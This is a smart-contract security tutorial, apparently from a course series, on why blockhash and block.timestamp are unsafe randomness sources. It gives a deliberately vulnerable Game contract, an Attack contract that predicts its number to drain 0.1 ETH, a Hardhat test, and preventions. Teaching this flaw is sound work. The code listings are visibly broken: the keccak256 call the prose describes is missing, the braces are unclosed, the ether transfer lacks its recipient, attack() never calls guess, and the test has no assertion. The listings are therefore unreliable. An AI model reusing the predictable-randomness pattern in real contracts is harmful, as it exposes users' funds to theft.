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🤫 A cautionary tale to never use on-chain randomness

Randomness is a hard problem. Computers run code that is written by programmers, and follows a given sequence of steps. As such, it is extremely hard to design an algorithm that will give you a 'random' number, since that random number must be coming from an algorithm that follows a certain sequence of steps. Now, of course, some functions are better than others.

In this case, we will specifically look at why you cannot trust on-chain data as sources of randomness (and also why Chainlink VRF's, that we used in Junior, were created).

🧰 Build

👀 Overview

  • We will build a game where there is a pack of cards.
  • Each card has a number associated with it which ranges from 0 to 2²⁵⁶–1
  • Player will guess a number that is going to be picked up.
  • The dealer will then at random pick up a card from the pack
  • If someone correctly guesses the number, they win 0.1 ETH
  • We will hack this game today :)

👷 Setting up Hardhat

Let's start building and see how this would practically work. To start the project, open up your terminal and create a new project directory.

mkdir randomness

Let's start setting up Hardhat inside the randomness directory.

cd randomness
npm init --yes
npm install --save-dev hardhat @nomicfoundation/hardhat-toolbox
npx hardhat

when prompted, choose the Create a Javascript Project option and follow the steps.

Let's first understand what abi.encodedPacked does.

We have previously used abi.encode in the Sophomore NFT tutorial, and earlier in the Merkle Tree tutorial. It is a way to concatenate multiple data types into a single bytes array, which can then be converted to a string. This is used to compute the tokenURI of NFT collections often. encodePacked takes this a step further, and concatenates multiple values into a single bytes array, but also gets rid of any padding and extra values. What does this mean? Let's take uint256 as an example. uint256 has 256 bits in it's number. But, if the value stored is just 1, using abi.encode will create a string that has 255 0's and only 1 1. Using abi.encodePacked will get rid of all the extra 0's, and just concatenate the value 1.

For more information on abi.encodePacked, go ahead and read this article

Writing the Smart Contracts

Create a file named as Game.sol inside your randomness/contracts folder and add the following lines of code.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract Game {
    constructor() payable {}

    // Randomly picks a number out of `0 to 2²⁵⁶–1`.
    function pickACard() private view returns (uint256) {
        // `abi.encodePacked` takes in the two params - `blockhash` and `block.timestamp`
        // and returns a byte array which further gets passed into keccak256 which returns `bytes32`
        // which is further converted to a `uint`.
        // keccak256 is a hashing function which takes in a bytes array and converts it into a bytes32
        uint256 pickedCard = uint256(
                abi.encodePacked(blockhash(block.number), block.timestamp)
        return pickedCard;

    // It begins the game by first choosing a random number by calling `pickACard`
    // It then verifies if the random number selected is equal to `_guess` passed by the player
    // If the player guessed the correct number, it sends the player `0.1 ether`
    function guess(uint256 _guess) public {
        uint256 _pickedCard = pickACard();
        if (_guess == _pickedCard) {
            (bool sent, ) ={value: 0.1 ether}("");
            require(sent, "Failed to send ether");

    // Returns the balance of ether in the contract
    function getBalance() public view returns (uint256) {
        return address(this).balance;

Now create a file called as Attack.sol inside your contracts folder and add the following lines of code.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "./Game.sol";

contract Attack {
    Game game;

    // Creates an instance of Game contract with the help of `gameAddress`
    constructor(address gameAddress) {
        game = Game(gameAddress);

    // Attacks the `Game` contract by guessing the exact number because `blockhash` and `block.timestamp`
    // is accessible publicly
    function attack() public {
        // `abi.encodePacked` takes in the two params - `blockhash` and `block.timestamp`
        // and returns a byte array which further gets passed into keccak256 which returns `bytes32`
        // which is further converted to a `uint`.
        // keccak256 is a hashing function which takes in a bytes array and converts it into a bytes32
        uint256 _guess = uint256(
                abi.encodePacked(blockhash(block.number), block.timestamp)

    // Gets called when the contract receives ether
    receive() external payable {}
  • How the attack takes place is as follows:

    • The hacker calls the attack function from the Attack.sol
    • attack further guesses the number using the same method as Game.sol which is uint(keccak256(abi.encodePacked(blockhash(block.number), block.timestamp)))
    • Attacker is able to guess the same number because blockhash and block.timestamp is public information and everybody has access to it
    • The attacker then calls the guess function from Game.sol
    • guess first calls the pickACard function which generates the same number using uint(keccak256(abi.encodePacked(blockhash(block.number), block.timestamp))) because pickACard and attack were both called in the same block.
    • guess compares the numbers and they turn out to be the same.
    • guess then sends the Attack.sol 0.1 ether and the game ends
    • Attacker is successfully able to guess the random number

Writing the Test

Create a new file named attack.js inside the test folder and add the following lines of code

const { ethers, waffle } = require("hardhat");
const { expect } = require("chai");
const { BigNumber, utils } = require("ethers");

describe("Attack", function () {
  it("Should be able to guess the exact number", async function () {
    // Deploy the Game contract
    const Game = await ethers.getContractFactory("Game");
    const game = await Game.deploy({ value: utils.parseEther("0.1") });
    await game.deployed();

    console.log("Game contract address", game.address);

    // Deploy the attack contract
    const Attack = await ethers.getContractFactory("Attack");
    const attack = await Attack.deploy(game.address);

    console.log("Attack contract address", attack.address);

    // Attack the Game contract
    const tx = await attack.attack();
    await tx.wait();

    const balanceGame = await game.getBalance();
    // Balance of the Game contract should be 0


Now open up a terminal pointing to randomness folder and execute this

npx hardhat test

If all your tests passed, you have successfully completed the hack and were able to predict the randomness with 100% accuracy, so it wasn't really that random.

👮 Preventions

  • Don't use blockhash, block.timestamp, or really any sort of on-chain data as sources of randomness
  • You can use Chainlink VRF's for true source of randomness

👋 Conclusion

Hope you learnt something from this level. If you have any questions or feel stuck or just want to say Hi, hit us up on our Discord. We look forward to seeing you there!